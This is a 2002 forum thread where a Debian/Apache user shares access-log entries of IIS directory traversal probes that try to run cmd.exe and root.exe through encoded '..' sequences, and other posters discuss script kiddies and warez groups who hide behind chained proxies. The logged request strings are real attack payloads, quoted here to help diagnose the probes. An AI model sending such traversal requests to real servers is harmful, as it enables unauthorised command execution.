Web Server Attacks?

Busby · Post by **Busby** » Mon Nov 25, 2002 4:23 pm

I have a computer running Debian 3.0 and I am messing around using Apache. I set up the webserver and such (actually have 3 instances of Apache that listen on different ports). Today was the first day that I allowed the ports to be forwarded from my router so I could access it from school. I have authenication setup (users + passwords) and on my port 80 server I have it so it only allows from my home network basically. Well today I decided to check my Access.log file and there were a lot of instances where I saw the following:

"GET /scripts/root.exe?/c+dir HTTP/1.0" 403 283 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 281 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 291 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 291 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 305 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 322 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 322 "-" "-"
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 338 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 304 "-" "-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 304 "-" "-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 304 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284 "-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284 "-" "-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 305 "-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 305 "-" "-"

Now I'm not stupid but it appears as though people are trying to crash the server, which is running Windows. It is on Debian and everything is working and up to date and such. Should I worry about these or just ignore them as script kiddies scanning port 80 and trying to crash a webserver? The reason I ask is I also run MySQL and I have phpMyAdmin working, but it is under the protected one where connections are limited to my network. I don't want people to be able to get into phpMyAdmin and then mess with my MySQL databases. Any concerns? Should I just block port 80?

PreDatoR · Post by **PreDatoR** » Mon Nov 25, 2002 8:11 pm

Your server was being hacked... Common thing that happens with Winshit servers. the SQL and IIS are too vulnerable and prone to attacks. Find any directory's that were once not there or anything like that. From what it looks like they were tryin' to gain access to build a ftp server on your server. search google for sql iis ftp hacking should pull up some info about it.

Busby · Post by **Busby** » Mon Nov 25, 2002 8:42 pm

Ok I totally just realized I made an error.

"Now I'm not stupid but it appears as though people are trying to crash the server, which is running Windows"

meant to read "Now I'm not stupid but it appears as though people are trying to crash a server which is running Windows". Again this box is a Linux box so those things did nothing at all. This is not IIS but Apache for Linux and i am running MySQL server and not MSSQL. I have multiple instances of those same logs and all are from a different IP address so I assume it is just script kiddies that run a port scan, find an open port 80 and then have those commands automatically executed. Everything is running fine and nothing is wrong so I dunno.

PreDatoR · Post by **PreDatoR** » Mon Nov 25, 2002 8:53 pm

If your running Linux i wouldn't worry then. I'm sure its hackable but a lot more secure than any windows servers... If you look at the commands they are trying to do their trying to do it on a windows system. Damn rookies lol

Gand1 · Post by **Gand1** » Tue Nov 26, 2002 4:51 pm

Yeah, that is definitely script kiddies trying to hack, very badly mind you. It looks like they are trying to run a few commands via the URL line.

plucky duck · Post by **plucky duck** » Tue Nov 26, 2002 7:47 pm

I'm trying to read the log and I see some cmd.exe and root.exe, those are executive commands? What do the scripts do and where abouts are they doing it? In the web browser URL?

PreDatoR · Post by **PreDatoR** » Tue Nov 26, 2002 8:11 pm

any of you ever heard of the fxp scene i know there's probably a bunch of you that do. But i'll tell you this that wasn't done by a script and if it was done on a vulnerable IIS or SQL Windows server it would have been hacked. Tehy find vulnerable servers hack them for the sole purpose of putting servu on it and running a FTP. Everythign on the server is left as normal they just want the ftp running on it. They normally only hack 5mbit and up connections for the download speed. Then upload the newest warez for their groups to share and download from. Its really not that hard to hack then, some use IE to do it others use telnet. And the good hackers use 3-5 socks 4 or 5 proxy's so its impossible to be traced back to them.